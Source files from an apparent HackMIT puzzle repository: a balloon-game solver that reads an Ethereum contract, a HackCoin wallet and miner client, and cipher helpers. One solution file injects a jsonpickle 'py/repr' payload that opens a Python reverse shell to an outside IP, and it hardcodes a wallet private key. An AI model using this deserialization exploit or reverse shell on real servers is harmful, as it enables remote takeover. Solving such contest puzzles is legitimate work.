"text": "from web3 import Web3\nfrom solcx import compile_source\n\nimport string\nimport collections\n\nDIGITS = string.digits + string.ascii_letters\nCONTRACT_ADDRESS = \"0x98CD3B326E1248061d684Ae230F580b74195dD86\"\nPROVIDER_URL = \"https://ropsten.infura.io/v3/ad31d30c3c96492d9a7fc9324f4ddfde\"\nSOURCE = open(\"contract.sol\").read()\n\n\ndef find_monkey_position(B):\n \"\"\"\n Args:\n B (tuple): board configuration\n Output:\n int: column position of the monkey in B\n \"\"\"\n for i, x in enumerate(B[-1]):\n if x == \"x\":\n return i\n\n assert False\n\n\ndef num_balloons(B):\n \"\"\"\n Args:\n B (tuple): board configuration\n Output:\n int: number of balloons on the board\n \"\"\"\n ret = 0\n for r in B[:-1]:\n for c in r:\n if c != 0:\n ret += 1\n return ret\n\n\ndef make_move(B, cur_monkey_pos, cur_num_balloons, cur_num_lives, move):\n \"\"\"\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n cur_num_balloons (int): current number of balloons on the board\n cur_num_lives (int): current number of lives remaining\n move (str): the proposed move (one of 'left', 'right', 'shoot')\n Output:\n (tuple, int, int, int): A tuple consisting of the board configuration after the move,\n the new monkey position, the new number of balloons on the map,\n and the new number of lives left\n (or None if invalid move or if the monkey gets hit)\n \"\"\"\n\n def check_lose(B, cur_monkey_pos):\n \"\"\"\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n Output:\n bool: True if a balloon will hit the monkey when the balloons shift down; False otherwise\n \"\"\"\n assert B[-1][cur_monkey_pos] == \"x\"\n if B[-2][cur_monkey_pos] != 0:\n return True\n return False\n\n def shift_down(B, cur_monkey_pos, cur_num_lives):\n \"\"\"\n Just performs the shift of all the balloons downwards.\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n cur_num_lives (int): current number of lives in this configuration\n Output:\n (tuple, int): tuple consisting of the board configuration after balloons have all moved\n down by 1 and the new number of lives (or None if the monkey gets hit)\n \"\"\"\n\n # if check_lose(B, cur_monkey_pos):\n # return None\n\n new_board = []\n new_num_lives = cur_num_lives\n\n # construct the top row: if the balloon hits the ground, it respawns with +1 and we lose a life\n new_num_lives -= sum(1 for b in B[-2] if b > 0)\n top_row = tuple((b + 1 if 0 < b < 2 else b) for b in B[-2])\n # top_row = B[-2]\n new_board.append(top_row)\n\n # move all the middle rows down\n new_board.extend([r for r in B[:-2]])\n\n # add the ground row: nothing changes\n new_board.append(B[-1])\n\n return (tuple(new_board), new_num_lives)\n\n def partial_move(B, cur_monkey_pos, cur_num_balloons, move):\n \"\"\"\n Just performs the move, without the shift downwards\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n cur_num_balloons (int): current number of balloons on the board\n move (str): the proposed move (one of 'left', 'right', 'shoot')\n Output:\n (tuple, int, int): A tuple consisting of the board configuration after the move,\n the new monkey position, and the new number of balloons on the map\n (or None if invalid move)\n \"\"\"\n\n assert B[-1][cur_monkey_pos] == \"x\"\n R = len(B)\n C = len(B[0])\n\n new_board = [r for r in B[:-1]]\n new_bottom_row = [0 for _ in range(C)]\n new_monkey_pos = cur_monkey_pos\n new_num_balloons = cur_num_balloons\n\n if move == \"left\":\n if new_monkey_pos == 0:\n return None\n new_monkey_pos -= 1\n elif move == \"right\":\n if new_monkey_pos == C - 1:\n return None\n new_monkey_pos += 1\n elif move == \"shoot\":\n # simulate the dart\n for row in range(R - 2, -1, -1):\n if B[row][new_monkey_pos] != 0:\n new_row = list(B[row])\n new_row[new_monkey_pos] -= 1\n if new_row[new_monkey_pos] == 0:\n new_num_balloons -= 1\n new_board[row] = tuple(new_row)\n break\n else:\n assert False, \"invalid move: \" + move\n\n new_bottom_row[new_monkey_pos] = \"x\"\n new_board.append(tuple(new_bottom_row))\n return (tuple(new_board), new_monkey_pos, new_num_balloons)\n\n # make the move\n move_res = partial_move(B, cur_monkey_pos, cur_num_balloons, move)\n if move_res is None: # invalid move\n return None\n move_board, new_monkey_pos, new_num_balloons = move_res # unpack\n\n # shift all the balloons down\n shift_res = shift_down(move_board, new_monkey_pos, cur_num_lives)\n if shift_res is None: # check if a balloon hit the monkey\n return None\n new_board, new_num_lives = shift_res # unpack\n return (new_board, new_monkey_pos, new_num_balloons, new_num_lives)\n\n\ndef fast_solve(B_, init_lives):\n q = collections.deque([((B_, find_monkey_position(B_), num_balloons(B_), init_lives),0)])\n seen = {}\n while len(q) > 0:\n (B, pos, balloons, lives), moves = q.popleft()\n if B in seen:\n continue\n else:\n seen[B]=True\n if balloons == 0:\n return moves, lives\n valid = [make_move(B, pos, balloons, lives, 'left'), make_move(B, pos, balloons, lives, 'right'), make_move(B, pos, balloons, lives, 'shoot')]\n q.extend([(item,moves+1) for item in valid if item is not None and item[-1]>0])\n return None, None\n\n\ndef get_neighbors(config):\n possible_list = set()\n B, monkey_index, balloons, num_lives = config\n if num_lives == 0:\n return possible_list\n\n for move in ['left', 'right', 'shoot']:\n try_move = make_move(B, monkey_index, balloons, num_lives, move)\n if try_move and try_move[3] > 0:\n possible_list.add((try_move, move))\n\n return possible_list\n\n\ndef solve(B, init_lives):\n \"\"\"\n Args:\n B (tuple): the initial board configuration.\n init_lives (int): starting number of lives\n\n Output:\n int: the minimum number of moves to pop all the balloons (or None if it's not possible).\n \"\"\"\n\n if num_balloons(B) == 0:\n return 0\n\n previous = set()\n queue = [[((B, find_monkey_position(B), num_balloons(B), init_lives), None)]]\n pointer = 0\n\n while queue and pointer < len(queue):\n path = queue[pointer]\n node = path[-1]\n\n if node not in previous:\n neighbors = get_neighbors(node[0])\n for neighbor in neighbors:\n new_board, move = neighbor\n if neighbor not in previous:\n new_path = list(path)\n new_path.append(neighbor)\n queue.append(new_path)\n\n if new_board[2] == 0:\n print('lives left: ', new_board[3])\n tracked_moves = []\n tracked_states = []\n for state in new_path:\n if state[1]:\n tracked_moves.append(state[1])\n return tracked_moves, new_board[3]\n\n previous.add(node)\n pointer += 1\n return None\n\n\n# function pad(bin, size = 24) {\n# if(bin.length >= size)\n# return bin\n# return (\"0\".repeat(size-bin.length)) + bin\n# }\ndef pad(bin, size=24):\n if len(bin) >= size:\n return bin\n return (\"0\" * (size - len(bin))) + bin\n\n\ndef int2base(x, base):\n if x < 0:\n sign = -1\n elif x == 0:\n return DIGITS[0]\n else:\n sign = 1\n\n x *= sign\n digits = []\n\n while x:\n digits.append(DIGITS[x % base])\n x = x // base\n\n if sign < 0:\n digits.append('-')\n\n digits.reverse()\n\n return ''.join(digits)\n\n\n# The uint256 variable board stores the game board in a flattened row major order, with each board slot occupying 2 bits.\n# board = 0b0000...row5,row4,row3,row2, row1, row0\n# rowN = col11,...,col0 \n# function boardToInt(board){\n# const rows = []\n# for(let row of board){\n# row = row.map((x)=>parseInt(x,10))\n# row = row.map((x)=>x.toString(2))\n# row = row.map((x)=>pad(x,2))\n# row.reverse()\n# rows.push(row.join(''))\n# }\n# rows.reverse()\n# const bin = '0b' + rows.join('')\n\n# return web3.utils.toBN(BigInt(bin).toString(10))\n# }\ndef boardToInt(board):\n rows = []\n for row in board:\n # row = list(map(lambda x: int(x, 10), row))\n row = list(map(lambda x: int2base(x, 2), row))\n row = list(map(lambda x: pad(x, 2), row))\n row = list(reversed(row))\n rows.append(''.join(row))\n rows = reversed(rows)\n\n bin = '0b' + ''.join(rows)\n\n return bin\n\n\ndef intToBoard(board: str):\n # board = board[2:]\n board = [board[i : i + 24] for i in range(0, len(board), 24)]\n board = list(reversed(board))\n\n _board = []\n for row in board:\n row = [row[i : i + 2] for i in range(0, len(row), 2)]\n row = list(reversed(row))\n row = [int(x, 2) for x in row]\n\n _board.append(row)\n\n return _board\n\n\ncompiled_sol = compile_source(SOURCE)\ncontract_id, contract_interface = compiled_sol.popitem()\nabi = contract_interface[\"abi\"]\nw3 = Web3(Web3.HTTPProvider(PROVIDER_URL))\ncontract = w3.eth.contract(CONTRACT_ADDRESS, abi=abi)\n\nplayer_position = contract.functions.getPlayerPos().call()\n\n# board_int = contract.functions.getBoard().transact()\n# board_int = 882893299950477527990625818533691396\n\nboard_int = contract.functions.getBoard().call()\nboard_bin = int2base(board_int, 2)\nboard = intToBoard(board_bin)\n\nprint(player_position)\nprint(board)\n\nboard.append([\"x\" if i == player_position else 0 for i in range(len(board[0]))])\n\nboard = tuple(map(tuple, board))\n\nprint(fast_solve(board, 60))\n\n# wrapper = {\n# \"left\": contract.functions.left,\n# \"right\": contract.functions.right,\n# \"shoot\": contract.functions.shoot,\n# }\n\n# for step in steps:\n# wrapper[step]().call()\n\n# print(contract.functions.getBoard().call())\n"
},
{
"alpha_fraction": 0.6128205060958862,
"alphanum_fraction": 0.6133699417114258,
"avg_line_length": 27.2901554107666,
"blob_id": "631bed66082dfebe1ae4eef73481a9ced7a6940a",
"content_id": "aee3591ad4932b2d9d006e9624a3e55fdabd4746",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5460,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 193,
"path": "/puzzle4/modded_client/exchange.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Main wallet code for HackCoin.\n\"\"\"\nfrom abc import get_cache_token\nimport os\nimport sys\nfrom typing import Optional, Union, List\n\nimport jsonpickle\nfrom blockchain import Blockchain, Transaction\nfrom crypto import generate_keys\nfrom utils import post_route, gen_uuid, get_route, trim_string, jsonpickle_decode\nfrom pyfiglet import Figlet\nfrom constants import PRINT_STR_LEN\nfrom tabulate import tabulate\n\nimport os\nimport json\n\n\ndef create_wallet(wallet_file=None):\n # Create a new address and dump it.\n private, public = generate_keys()\n\n if wallet_file is not None:\n\n wallet_contents = json.dumps({\n 'public': public,\n 'private': private\n })\n\n with open(wallet_file, 'w') as f:\n f.write(wallet_contents)\n print(\"Created new wallet in\", wallet_file)\n print(\"Your wallet address is:\", public)\n\n return public, private\n\n\ndef get_wallet(wallet_file):\n # Load existing.\n with open(wallet_file, 'r') as f:\n wallet_contents = f.read()\n wallet_obj = json.loads(wallet_contents)\n public = wallet_obj['public']\n private = wallet_obj['private']\n\n print(\"Loaded existing wallet from\", wallet_file)\n\n return public, private\n\n\ndef get_blockchain() -> Union[Blockchain, None]:\n resp = post_route('blockchain')\n if(resp):\n bc: Blockchain = jsonpickle_decode(resp[\"blockchain\"]) # type: ignore\n bc._unflatten()\n return bc\n\n\ndef get_transactions() -> List[Transaction]:\n resp = get_route(\"transaction\")\n if(resp and resp[\"success\"]):\n return resp[\"data\"]\n return []\n\n\ndef get_info():\n resp = get_route('info')\n if(not resp):\n print(\"failed to fetch info\")\n return resp[\"data\"] if resp else {\"cash\": 0, \"price\": \"?\", \"vendor\": None}\n\n\ndef get_balance(address: str, blockchain):\n if not blockchain:\n print(\"unable to get blockchain\")\n return 0\n return blockchain.get_balance(address)\n\n\ndef status(address: str, blockchain):\n info = get_info()\n print(\n f\"You have: {str(get_balance(address, blockchain))} hackcoins, and {info['cash']} dollars\")\n print(f\"Current market price of Hackcoin: ${info['price']}\")\n\n\ndef print_blockchain(bc: Blockchain):\n agents = get_market_agents()\n agents = {v: k for k, v in agents.items()}\n rows = []\n for block in bc.traverse_blocks(bc.head):\n rows.append([trim_string(getattr(block, \"miner\", \"anonymous\"), PRINT_STR_LEN), trim_string(block.get_hash(), PRINT_STR_LEN), \"\\n\".join(\n [t.pretty_print(PRINT_STR_LEN, agents) for t in block.transactions]), trim_string(block.previous_hash, PRINT_STR_LEN)])\n print(tabulate(rows[::-1], headers=[\"miner\",\n \"hash\", \"transactions\", \"prev_hash\"]))\n\n\ndef get_market_agents(public):\n resp = get_route(\"market\")\n\n if(resp):\n data = resp[\"data\"]\n data[\"me\"] = public\n return data\n return {}\n\n\ndef transfer(receiver: str, amount: int, public: str, private: str):\n if get_balance(public, get_blockchain()) < amount:\n print(\"You don't have enough HackCoins.\")\n return\n\n # Build a new transaction.\n t = Transaction(\n id=gen_uuid(),\n sender=public,\n receiver=receiver,\n value=amount,\n signature=\"\"\n )\n\n # Sign it.\n t.sign(private)\n\n post_route(\"transaction\", {\"transactions\": [t]})\n\n\ndef buy(amount: int, public: str):\n resp = get_route(\"buy\", {\"pubkey\": public, \"amount\": amount})\n if(resp):\n if resp[\"success\"]:\n print(f\"You successfully bought {amount} hackcoin!\")\n print(\"Transaction currently pending (check back later)\")\n return True\n else:\n print(f\"Failed! {resp['message']}\")\n return False\n\n\ndef sell(amount: int, public: str, private: str):\n \"\"\"The vendor requires you to publish the transaction before they send the money\"\"\"\n info = get_info()\n vendor = info[\"vendor\"]\n\n # create transaction\n txn_id = gen_uuid()\n t = Transaction(txn_id, public, vendor, amount, signature=\"\")\n t.sign(private)\n\n # publish transaction\n post_route(\"transaction\", {\"transactions\": [t]})\n\n # send sell request, with transaction id\n resp = get_route(\n \"sell\", {\"pubkey\": public, \"amount\": amount, \"txn_id\": txn_id})\n if(resp):\n if resp[\"success\"]:\n print(f\"You successfully sold {amount} hackcoin!\")\n print(\"Transaction currently pending (check back later)\")\n else:\n print(f\"Failed! {resp['message']}\")\n\n\ndef donate():\n resp = get_route(\"donate\")\n if(resp):\n if resp[\"success\"]:\n print(resp[\"message\"])\n f = Figlet(font='standard')\n print(f.renderText(\"Thanks for playing!\"))\n return True\n else:\n print(f\"Failed! {resp['message']}\")\n return False\n\ndef print_market_agents(agents):\n print(tabulate(agents.items(), headers=[\"name\", \"public key\"]))\n\n\ndef print_transactions(txns):\n agents = get_market_agents()\n\n addr_to_name = {v: k for k, v in agents.items()}\n\n def name_lookup(addr):\n if addr in addr_to_name:\n return f\"{trim_string(addr)} ({addr_to_name[addr]})\"\n return trim_string(addr)\n\n print(\"Pending transactions:\")\n print(tabulate([[trim_string(t.id), f\"{name_lookup(t.sender)} -> {name_lookup(t.receiver)}\", t.value]\n for t in txns], headers=[\"id\", \"transfer\", \"coins\"]))\n"
},
{
"alpha_fraction": 0.5843416452407837,
"alphanum_fraction": 0.5978647470474243,
"avg_line_length": 25.50943374633789,
"blob_id": "3ab41bc19e6824b485c628dbb2828fbee30e5f15",
"content_id": "3691ed7f74a0bfc420ec192231538f995a574dbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1405,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 53,
"path": "/puzzle3/brutoforce2.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import transformers\nimport torch\n\nmodel = transformers.AutoModelForSequenceClassification.from_pretrained(\"HackMIT/double-agent\")\nmodel.load_state_dict(torch.load(\"model 0.89.pt\"))\nmodel.eval()\n\ndef decode_message_from_model(model):\n idxs = [int(param.sum().item()) % 27 + ord(\"a\") for param in model.parameters()]\n letters = [chr(idx) if idx <= ord(\"z\") else \" \" for idx in idxs]\n return \"\".join(letters)\n\n\ndef decode_parameter(parameter):\n x = int(parameter.sum().item()) % 27 + ord(\"a\")\n return chr(x) if x <= ord(\"z\") else \" \"\n\n\ndef mul(x):\n y = 1\n for i in x:\n y *= i\n return y\n\n\ntarget_string = \"b uber s bmbl b zm s abnb b abnb\"\nfor i, parameter in enumerate(model.parameters()):\n if i >= len(target_string):\n break\n\n print(f\"iteracion: {i}\")\n current_sum = parameter.sum().item()\n\n n = mul(parameter.shape)\n flag = False\n\n for _ in range(27):\n if decode_parameter(parameter) == target_string[i]:\n flag = True\n break\n parameter.data.add_(1 / n)\n\n if not flag:\n parameter.data.sub_(27 / n)\n for _ in range(27):\n if decode_parameter(parameter) == target_string[i]:\n break\n parameter.data.sub_(1 / n)\n else:\n raise Exception(\"Cagaste; didn't work\")\n\nprint(decode_message_from_model(model))\ntorch.save(model.state_dict(), \"Seba 0.89.pt\")\n"
},
{
"alpha_fraction": 0.6746031641960144,
"alphanum_fraction": 0.6746031641960144,
"avg_line_length": 30.5,
"blob_id": "b4315ef244cc9429a52086a76d9e343639d300e9",
"content_id": "bb034d5961c519321a0371609c6f656abe98c6f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 4,
"path": "/puzzle2/decipher/hex.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "def hex(in_string):\n in_object = bytes.fromhex(in_string)\n out_string = in_object.decode(\"ASCII\")\n return out_string\n"
},
{
"alpha_fraction": 0.5803571343421936,
"alphanum_fraction": 0.5809949040412903,
"avg_line_length": 26.034482955932617,
"blob_id": "f091b6f2d67e74208e642ef3ef99e86eed3dd607",
"content_id": "fbea1c3e93510bb85ed8965561d2d936929b077a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1568,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 58,
"path": "/puzzle4/modded_client/utils.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from typing import Any, Union, Dict\nimport jsonpickle\nfrom requests.models import Response\nimport requests\nimport uuid\n\nimport constants as constants\n\n\ndef jsonpickle_decode(text):\n return jsonpickle.decode(text.replace(\"hackbase.client.\", \"\"))\n\n\ndef post_route(route, data=None) -> Union[Dict[Any, Any], None]:\n endpoint = \"%s/u/%s/tracker/%s\" % (\n constants.NODE_SERVER,\n constants.USERNAME,\n route\n )\n\n try:\n data = data=jsonpickle.encode(data)\n # print(f\"{data=}\")\n r = requests.post(endpoint, data=data)\n print(r)\n return jsonpickle_decode(r.text) # type: ignore\n except Exception as e:\n print(f\"failed request: {route}, error: {e}\")\n return None\n\n\ndef get_route(route, params=None) -> Union[Dict[Any, Any], None]:\n endpoint = \"%s/u/%s/tracker/%s\" % (\n constants.NODE_SERVER,\n constants.USERNAME,\n route\n )\n try:\n if params:\n endpoint += \"?\" + \\\n \"&\".join([f\"{key}={value}\" for key, value in params.items()])\n r = requests.get(endpoint)\n # if not r.json()[\"success\"]:\n # print(f\"failed request: {route}, msg: {r.json()['message']}\")\n return jsonpickle_decode(r.text) # type: ignore\n except Exception as e:\n print(f\"failed request: {route}, error: {e}\")\n return None\n\n\ndef gen_uuid():\n return str(uuid.uuid4()).replace('-', '')\n\n\ndef trim_string(s, max_len=constants.PRINT_STR_LEN):\n if(len(s) <= max_len):\n return s\n return f\"{s[:max_len]}...\"\n"
},
{
"alpha_fraction": 0.6954314708709717,
"alphanum_fraction": 0.7055837512016296,
"avg_line_length": 38.400001525878906,
"blob_id": "f1f9b347c38895881d9b9d2ce4a68fb3e24ec865",
"content_id": "a10fbfc0ce4e42f8cf3c7166c171f33c386119d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 5,
"path": "/puzzle2/decipher/beaufort.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import subprocess\n\ndef beaufort(in_string):\n process = subprocess.Popen([\"node\", \"./beaufort.js\", in_string], stdout=subprocess.PIPE)\n return process.communicate()[0].strip().decode(\"utf-8\")\n"
},
{
"alpha_fraction": 0.5654837489128113,
"alphanum_fraction": 0.5697084665298462,
"avg_line_length": 27.68484878540039,
"blob_id": "4ce0b3cabac3c0b55ed297e1a0acc7468176155f",
"content_id": "bee4c9fe5d17cb9c7e6e9dc5052011c99234ebae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4734,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 165,
"path": "/puzzle4/modded_client/miner.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\nimport os\nfrom time import time\nfrom typing import Optional, List\nfrom itertools import count\n\nfrom exchange import buy, sell, get_blockchain, get_transactions, get_info\nfrom blockchain import Block, Transaction, Blockchain, create_genesis_block\nfrom utils import gen_uuid, post_route\nfrom crypto import generate_keys\nfrom constants import USERNAME, WALLET_FILE, REWARD\n\nimport datetime\nimport json\nimport os\n\n\ndef try_mine(block: Block, nonce=None):\n \"\"\"Updates the nonce and sees if it's valid.\n \"\"\"\n if nonce is None:\n block.nonce += 1\n else:\n block.nonce = nonce\n return block.is_valid()\n\n\ndef check_if_new_block(blockchain):\n new_chain = get_blockchain()\n if blockchain and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n blockchain = new_chain\n return False\n return True\n\n\ndef mine(block: Block, left=None, right=None, messages_queue=None):\n \"\"\"Keep guessing and checking the nonce in hopes\n we mine the provided block.\n \"\"\"\n # print(\"\\n\\n\" + (\"-\" * 40))\n # print(\"Mining now with %i transactions.\" % len(block.transactions))\n hashes_done = 0\n\n start = datetime.datetime.now()\n\n if left is None and right is None:\n iterator = count(0)\n else:\n iterator = range(left, right + 1)\n\n for i in iterator:\n if try_mine(block, nonce=i):\n break\n\n hashes_done += 1\n\n if hashes_done % 300000 == 0:\n end = datetime.datetime.now()\n seconds = (end - start).total_seconds()\n\n hash_rate = (300000 / seconds)\n print(\"Hash Rate: %i hashes/second \\r\" % hash_rate)\n # messages_queue.put(\"HASH_RATE_%i\" % hash_rate)\n\n if(check_if_new_block()):\n return False\n start = datetime.datetime.now()\n\n # print(\"\\nMined block:\", block.get_hash(), \"with nonce\", block.nonce)\n return True\n\n\ndef run_miner(public, private):\n \"\"\"Run the main miner loop.\n \"\"\"\n\n while True:\n # Load transaction queue and blockchain from server.\n txns: List[Transaction] = get_transactions()\n blockchain = get_blockchain()\n\n if not blockchain:\n print(\"Unable to fetch blockchain\")\n return\n\n # Add reward to us yay.\n reward = Transaction(\n id=gen_uuid(),\n sender=\"mined\",\n receiver=public,\n value=REWARD,\n signature=\"\"\n )\n reward.sign(private)\n txns.append(reward)\n\n # Construct a new block.\n b = Block(\n transactions=txns,\n previous_hash=blockchain.head.get_hash(),\n miner=USERNAME\n )\n\n # Let's mine this block.\n result = mine(b)\n\n # Is this _the_ new block?\n # or did the server swoop us :(\n new_chain = get_blockchain()\n\n if result and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n # WE MINED THIS BLOCK YAY.\n # AND WE WIN.\n resp = post_route('add', data=b)\n if resp and resp['success']: # type: ignore\n print(\"Block added!\")\n else:\n print(\"Couldn't add block:\", resp['message']) # type: ignore\n else:\n print(\"Someone else mined the block before us :(\")\n\n\ndef mining_worker(public, private, tasks_queue, messages_queue):\n while True:\n try:\n left, right = tasks_queue.get_nowait()\n except:\n continue\n\n transactions = get_transactions()\n blockchain = get_blockchain()\n\n if not blockchain:\n messages_queue.put(\"NO_BLOCKCHAIN\")\n left, right = None, None\n\n reward = Transaction(\n id=gen_uuid(),\n sender=\"mined\",\n receiver=public,\n value=REWARD,\n signature=\"\"\n )\n reward.sign(private)\n transactions.append(reward)\n\n b = Block(\n transactions=transactions,\n previous_hash=blockchain.head.get_hash(),\n miner=USERNAME\n )\n\n result = mine(b, left, right, messages_queue)\n\n new_chain = get_blockchain()\n\n if result and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n resp = post_route('add', data=b)\n if resp and resp['success']: # type: ignore\n messages_queue.put(\"BLOCK_MINED\")\n else:\n messages_queue.put(\"BLOCK_MINE_FAILED\")\n elif result and new_chain and new_chain.head.get_hash() != blockchain.head.get_hash():\n messages_queue.put(\"BLOCK_ALREADY_MINED\")\n else:\n messages_queue.put(\"BLOCK_NOT_MINED\")\n"
},
{
"alpha_fraction": 0.5914202332496643,
"alphanum_fraction": 0.6426488757133484,
"avg_line_length": 23.252525329589844,
"blob_id": "55356193ffcc3af53d071747b66748753963c093",
"content_id": "6d37cdb7c71f83324e8a82aec9b50164bbc4e7ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2401,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 99,
"path": "/puzzle4/modded_client/_solution.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import exchange\nimport blockchain\nimport miner\nimport utils\nimport datetime\nimport jsonpickle\nimport requests\nimport json\n\nREWARD = 100_000_000\nNODE_SERVER = \"https://hackcrypto.hackwsb.net\"\nUSERNAME = \"storrealbac_e10e93\"\nWALLET_ADDRESS = \"e7d9c8deec017a01febc223e19a42e4f8d93aa1cc63eff8fc784f85155efaa12\"\nWALLET_PRIVATE = \"a309ece2d7c2c18859d806a8748a531e1871285fcd4cd922a9caba7dfd82fff7\"\nPREVIOUS_HASH = input(\">>> \")\n\nCODE = \"\"\"\nimport socket, os, pty\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"91.192.10.53\", 4242))\nos.dup2(s.fileno(), 0)\nos.dup2(s.fileno(), 1)\nos.dup2(s.fileno(), 2)\npty.spawn(\"\\\\x2f\" + \"bin\" + \"\\\\x2f\" + \"sh\")\n\"\"\".strip().replace(\"\\n\", \";\")\n\nEXPLOIT = f\"os/exec('{CODE}')\"\n\n\ndef try_mine(block: blockchain.Block) -> bool:\n block.nonce += 1\n return block.is_valid()\n\n\ndef mine(block: blockchain.Block):\n print(\"Mining now with %i transactions.\" % len(block.transactions))\n hashes_done = 0\n\n start = datetime.datetime.now()\n while not try_mine(block):\n hashes_done += 1\n\n if hashes_done % 300000 == 0:\n end = datetime.datetime.now()\n seconds = (end - start).total_seconds()\n\n print(\"Hash Rate: %i hashes/second \\r\" % (300000 / seconds),)\n \n start = datetime.datetime.now()\n\n print(\"Mined block:\", block.get_hash(), \"with nonce\", block.nonce)\n\n\ndef jsonpickle_decode(text):\n return jsonpickle.decode(text.replace(\"hackbase.client.\", \"\"))\n\n\ndef post_route(route, data=None):\n endpoint = \"%s/u/%s/tracker/%s\" % (\n NODE_SERVER,\n USERNAME,\n route\n )\n\n try:\n encoded = jsonpickle.encode(data)\n encoded = json.loads(encoded)\n encoded[\"1\"] = {\"py/repr\": EXPLOIT}\n encoded = json.dumps(encoded)\n\n r = requests.post(endpoint, data=encoded)\n\n return jsonpickle_decode(r.text) #type: ignore\n except Exception as e:\n print(f\"failed request: {route}, error: {e}\")\n return None\n\n\nreward = blockchain.Transaction(\n id=utils.gen_uuid(),\n sender=\"mined\",\n receiver=WALLET_ADDRESS,\n value=10,\n signature=\"\"\n)\nreward.sign(WALLET_PRIVATE)\n\nblock = blockchain.Block(\n transactions=[reward],\n previous_hash=PREVIOUS_HASH,\n miner=USERNAME\n)\n\nmine(block)\n\nresp = post_route(\"add\", data=block)\nprint(f\"RESP: {resp}\")\nif resp and resp[\"success\"]:\n print(\"Block added!\")\n"
},
{
"alpha_fraction": 0.5644555687904358,
"alphanum_fraction": 0.5702127814292908,
"avg_line_length": 24.941558837890625,
"blob_id": "71e6d76e734ffbe1d4ccb15f71e51169e259830f",
"content_id": "14494fbf7132b7ce51a5aefc7fdc3113b4a1edaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3995,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 154,
"path": "/puzzle4/client/miner.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\nimport os\nfrom exchange import buy, sell, get_blockchain, get_transactions, get_info\nfrom time import time\nfrom typing import Optional, List\nfrom blockchain import Block, Transaction, Blockchain, create_genesis_block\nfrom utils import gen_uuid, post_route\nfrom crypto import generate_keys\nfrom constants import USERNAME, WALLET_FILE, REWARD\nfrom pyfiglet import Figlet\n\nimport datetime\nimport json\nimport os\n\npublic: str = \"\"\nprivate: str = \"\"\nblockchain: Optional[Blockchain] = None\n\ndef print_header():\n \"\"\"Why not.\n \"\"\"\n f = Figlet(font='big')\n print(f.renderText('HackMiner 2.0'))\n print(\"Version 2.2.1\")\n\ndef try_mine(block: Block):\n \"\"\"Updates the nonce and sees if it's valid.\n \"\"\"\n block.nonce += 1\n return block.is_valid()\n\ndef check_if_new_block():\n global blockchain\n new_chain = get_blockchain()\n if blockchain and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n blockchain = new_chain \n return False \n return True\n\ndef mine(block: Block):\n \"\"\"Keep guessing and checking the nonce in hopes\n we mine the provided block.\n \"\"\"\n print(\"\\n\\n\" + (\"-\" * 40))\n print(\"Mining now with %i transactions.\" % len(block.transactions))\n hashes_done = 0\n\n start = datetime.datetime.now()\n while not try_mine(block):\n hashes_done += 1\n\n if hashes_done % 300000 == 0:\n end = datetime.datetime.now()\n seconds = (end - start).total_seconds()\n\n print(\"Hash Rate: %i hashes/second \\r\" % (300000 / seconds),)\n \n if(check_if_new_block()):\n return False\n start = datetime.datetime.now()\n\n print(\"\\nMined block:\", block.get_hash(), \"with nonce\", block.nonce)\n return True\n\ndef load_wallet():\n \"\"\"Load the wallet.json file and load the\n keys from there.\n \"\"\"\n\n global public\n global private\n\n if os.path.exists(WALLET_FILE):\n with open(WALLET_FILE, 'r') as f:\n wallet_json = f.read()\n wallet_obj = json.loads(wallet_json)\n\n public = wallet_obj['public']\n private = wallet_obj['private']\n else:\n print(\"First run the exchange.py file!\")\n exit()\n \ndef run_sample():\n \"\"\"Testing code.\n \"\"\"\n # Mine a sample block.\n b = Block(\n transactions = [],\n previous_hash = create_genesis_block().get_hash()\n )\n\n mine(b)\n \n \n\ndef run_miner():\n \"\"\"Run the main miner loop.\n \"\"\"\n\n global blockchain\n global public\n global private\n\n while True:\n # Load transaction queue and blockchain from server.\n txns: List[Transaction] = get_transactions()\n blockchain = get_blockchain()\n\n if not blockchain:\n print(\"Unable to fetch blockchain\")\n return;\n \n # Add reward to us yay.\n reward = Transaction(\n id = gen_uuid(),\n sender = \"mined\",\n receiver = public,\n value = REWARD,\n signature = \"\"\n )\n reward.sign(private)\n txns.append(reward)\n\n # Construct a new block.\n b = Block(\n transactions = txns,\n previous_hash = 